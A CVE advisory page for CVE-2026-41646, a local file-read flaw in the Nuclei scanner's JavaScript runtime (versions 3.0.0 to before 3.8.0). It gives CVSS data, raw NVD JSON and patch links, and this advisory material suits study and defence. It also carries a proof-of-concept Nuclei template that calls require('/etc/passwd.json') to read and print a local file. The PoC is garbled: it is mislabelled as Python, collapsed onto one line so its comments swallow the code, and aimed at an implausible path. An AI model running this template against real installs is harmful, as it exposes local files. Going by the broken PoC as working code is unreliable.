Security Vulnerability Report
中文
CVE-2026-41646 CVSS 5.5 MEDIUM

CVE-2026-41646

Published: 2026-05-08 04:16:18
Last Modified: 2026-05-08 19:42:59
Source: [email protected]

Description

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file access restriction. This issue has been patched in version 3.8.0.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:projectdiscovery:nuclei:*:*:*:*:*:go:*:* - VULNERABLE
Nuclei >= 3.0.0, < 3.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-41646 // Vulnerability: Local File Read via require() in Nuclei JS Protocol id: CVE-2026-41646-poc info: name: Nuclei Local File Read PoC severity: high description: Reads local .json file using require() javascript: - code: | // Attempt to read a local configuration file // This works in Nuclei < 3.8.0 try { const data = require('/etc/passwd.json'); // Example path, usually requires .js or .json // Or require('./config.json') console.log("File content read successfully:"); console.log(JSON.stringify(data)); } catch (e) { console.log("Error reading file: " + e.message); } args: # Example arguments if needed

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41646", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:18.383", "lastModified": "2026-05-08T19:42:59.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file access restriction. This issue has been patched in version 3.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectdiscovery:nuclei:*:*:*:*:*:go:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.8.0", "matchCriteriaId": "9E442141-1965-481A-BE82-B6DC11B58EAC"}]}]}], "references": [{"url": "https://github.com/projectdiscovery/nuclei/commit/6f2ade6a9b427c284c15a43445f9c7f055e60e5d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/pull/7332", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-29rg-wmcw-hpf4", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/projectdiscovery/nuclei/pull/7332", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.